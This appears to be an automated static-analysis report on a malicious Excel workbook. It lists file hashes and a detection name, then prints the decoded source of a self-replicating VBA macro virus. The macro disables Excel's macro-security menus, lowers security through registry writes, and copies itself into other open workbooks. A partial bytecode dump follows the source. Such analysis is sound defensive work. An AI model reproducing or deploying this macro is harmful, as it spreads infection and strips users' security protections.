Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55462b91e19332d3…

MALICIOUS

Office (OLE)

Size: 18.5 KB
Created: 2001-07-06 17:23:47
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 7db49bd88d4141c57b0210c28c2f005c
SHA-1: f1f809b769c123da43094a2dd7ea85a0739521b6
SHA-256: 55462b91e19332d3ca6c2abde0f52957bab9f67c2431ec489382219af46af59e
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an Excel workbook containing VBA macros. In its Workbook_Deactivate handler the macro disables the Tools > Macro > Security menu entries and then lowers Excel's macro security by writing, via System.PrivateProfileString, to the registry values HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6 (set to 0) and HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level (set to 1). It then copies its own workbook-module code into the active workbook's module (checking for the marker comment 'XM97/2k.tEster' to avoid re-infecting) and saves that workbook, which is consistent with macro-virus replication and persistence rather than a separate dropped payload. The ClamAV detection 'Xls.Trojan.Tester-3' further supports its malicious nature.

Heuristics (1)

  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5944 bytes
SHA-256: 9418001078baf582ace9987c320032853c5b880e9dafdee710fbc719192de9ed
Detection: ClamAV: Xls.Trojan.Tester-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XM97/2k.tEster

Sub Workbook_Deactivate()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
CommandBars("Tools").Controls("Macro").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = 0&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule        'cz
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule       'us
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule  'de
Set ThisBook = ThisWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule            'cz
Set ThisBook = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule           'us
Set ThisBook = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule      'de
vxCopy = ThisBook.Lines(1, ThisBook.countoflines)
If ActiveBook.Lines(1, 1) <> "'XM97/2k.tEster" Then
 ActiveBook.deletelines 1, ActiveBook.countoflines
 ActiveBook.insertlines 1, vxCopy
 If ActiveWorkbook.Path = "" Then
  ActiveWorkbook.SaveAs ActiveWorkbook.FullName
 Else
  ActiveWorkbook.Save
 End If
End If
'XM97/2k.tEster by gl_st0rm of [mions]
End Sub

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/d689602d65f2471f966bba7c893ec1a5.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Tento_sešit - 3550 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E "XM97/2k.tEster"
' Line #1:
' Line #2:
' 	FuncDefn (Sub deletelines())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd Controls 0x0001 
' 	ArgsMemLd Enabled 0x0001 
' 	MemSt System 
' Line #5:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd Controls 0x0001 
' 	ArgsMemLd Enabled 0x0001 
' 	MemSt System 
' Line #6:
' 	LitDI4 0x0000 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
' 	LitStr 0x0008 "Options6"
' 	Ld PrivateProfileString 
' 	ArgsMemSt book 0x0003 
' Line #7:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security"
' 	LitStr 0x0005 "Level"
' 	Ld PrivateProfileString 
' 	ArgsMemSt book 0x0003 
' Line #8:
' 	SetStmt 
' 	LitStr 0x000B "Tento_sešit"
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd CodeModule 0x0001 
' 	MemLd Item 
' 	Set _B_var_ActiveBook 
' 	QuoteRem 0x0058 0x0002 "cz"
' Line #9:
' 	SetStmt 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd CodeModule 0x0001 
' 	MemLd Item 
' 	Set _B_var_ActiveBook 
' 	QuoteRem 0x0058 0x0002 "us"
' 
... (truncated)